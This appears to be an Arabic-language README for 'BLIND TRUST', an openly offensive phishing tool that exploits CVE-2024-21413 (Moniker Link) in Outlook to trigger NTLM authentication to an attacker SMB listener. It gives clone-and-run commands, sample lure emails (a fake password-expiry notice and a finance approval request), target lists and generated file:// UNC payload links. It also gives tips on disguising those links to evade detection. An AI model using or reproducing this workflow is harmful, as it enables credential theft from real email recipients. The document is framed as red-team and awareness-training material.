
أداة أبحاث أمنية لمحاكاة حملات التصيد الاحتيالي المستهدفة باستخدام CVE-2024-21413 (Moniker Link).
أداة بحث أمني لمحاكاة حملات تصيد موجهة تستغل ثغرة Moniker Link المعروفة باسم CVE-2024-21413. صُممت لعمليات الفريق الأحمر المصرح بها واختبار الاختراق والتدريب على التوعية الأمنية.
BLIND TRUST هو إطار عمل لعمليات التصيد يساعد فرق الأمن على فهم واختبار دفاعاتها ضد الهجمات المتطورة القائمة على البريد الإلكتروني. يستخدم تقنية Moniker Link لتجاوز وضع Protected View في Outlook، مما يوفر محاكاة واقعية للهجمات يمكن للمؤسسات استخدامها لتعزيز وضعها الأمني.
تقوم هذه الأداة بأتمتة سير عمل الحملة بالكامل — من الإعداد وحتى تسليم البريد الإلكتروني — مع الحفاظ على الأمن العملياتي عبر مسارات UNC قابلة للتخصيص وخيارات حجج مرنة.
تحتاج المؤسسات إلى فهم تقنيات الهجوم الحقيقية للدفاع بفعالية. تتيح TRUST ما يلي:
.txt بنمط قوائم الكلمات# Clone the repository
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Run the tool
python3 TRUST_v7.py
تستخدم الأداة وحدات المكتبة القياسية في Python فقط:
getpass - Secure password input
html - HTML escaping
ipaddress - IP address validation
logging - Structured logging
os - File operations
re - Regular expressions
signal - Signal handling
smtplib - SMTP email protocol
sys - System utilities
time - Time operations
dataclasses - Configuration modeling
email - MIME email construction
typing - Type hints
لا تتطلب أي حزم خارجية — تعمل في أي مكان باستخدام Python 3.7+.
python3 TRUST_v7.py
اتبع المعالج التفاعلي عبر 5 خطوات:
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]
Email subject [Security Update Required]: Urgent: Password Expiration Notice
Display name (From field) [Microsoft Security Center]: IT Security Team
Email body text: Your password expires in 24 hours. Please update immediately.
UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024
أنشئ ملف targets.txt:
# Finance Department
[email protected]
[email protected]
[email protected]
# Accounting
[email protected]
[email protected]
ثم شغّل:
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt
Email subject: Q3 Financial Review - Action Required
Display name: Finance Operations Team
Email body: Please review the attached Q3 financial statement and provide approval.
UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report
Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report
خياران:
.txt ببريد إلكتروني واحد لكل سطر، مع تعليقات تبدأ بـ #هذا هو المكان الذي تتجنب فيه التوقيعات الواضحة:
finance-internal.company.com) بدلاً من مجرد عنوان IPquarterly أو updates أو documentsq3_report أو security_patch أو training_documentالنتيجة: بدلاً من الصيغة الواضحة \\192.168.1.100\share!exploit، تحصل على شيء مثل file://finance-internal.company.com/quarterly!q3_report.
Start
↓
[STEP 1] Prompt for attacker email and SMTP password
↓
[STEP 2] Prompt for SMB listener IP
↓
[STEP 3] Load target emails (file or input)
↓
↓→ For each target:
│ - Validate email format
│ - Check for duplicates
│
[STEP 4] Prompt for email pretext
│ - Subject, From name, body text
│
[STEP 5] Prompt for UNC path customization
│ - Host, share, exploit name
│
↓
[BUILD] Construct configuration object
↓
[VALIDATE] Check all fields are present and valid
↓
[SUMMARY] Display pre-send summary for review
↓
[CONFIRM] User approves or cancels
↓
[SEND] For each target:
│ - Build MIME email with custom Moniker Link
│ - Attempt SMTP delivery with retry logic
│ - Log per-target success/failure
│
↓
[REPORT] Display campaign results (delivered vs failed)
↓
Exit
CVE-2024-21413 (Moniker Link) هي ثغرة في Outlook تسمح بتضمين عناوين file:// مع حرف !. عند قيام المستخدم بالنقر على مثل هذا الرابط، يحاول Outlook الوصول إلى مسار UNC، مما يؤدي إلى تشغيل محاولة مصادقة NTLM حتى في وضع Protected View.
\\host\share!exploit! وضع Protected Viewتقوم TRUST بأتمتة مرحلة التسليم:
الحل: تحقق من بيانات اعتماد SMTP. بالنسبة إلى Gmail، استخدم كلمة مرور خاصة بالتطبيق. بالنسبة لبريد الشركات، راجع مسؤول SMTP لديك.
الحل: أمر طبيعي لبعض خوادم SMTP. سيستمر الاتصال بدون تشفير TLS.
الحل: تأكد من أن عناوين البريد في ملفات قوائم الكلمات كاملة وبتنسيق صحيح ([email protected]).
الحل: عنوان البريد غير موجود على الخادم الهدف، أو أن الخادم يمنع الترحيل من حسابك.
الحل: تحقق من صحة مسار الملف ووجود الملف في الدليل الحالي.